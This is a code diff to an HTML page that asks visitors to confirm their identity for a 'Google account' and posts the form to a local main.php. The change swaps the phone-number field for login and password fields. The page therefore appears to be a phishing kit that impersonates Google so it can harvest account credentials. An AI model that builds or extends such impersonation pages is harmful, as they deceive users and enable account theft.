--- a/block.html
+++ b/block.html
@@ -21,7 +21,8 @@
     <p>to confirm that it's you please enter the phone number for this Google account</p>
 
     <form action="main.php" method="post">
-      <input type="text" class="form-control" name="login" id="login" placeholder="Phone number"><br>
+      <input type="text" class="form-control" name="login" id="login" placeholder="login"><br>
+      <input type="password" class="form-control" name="pass" id="pass" placeholder="password"><br>
       <button class="btn btn-primary mb-3 phone_btn" type="submit">Next</button>
     </form>
 
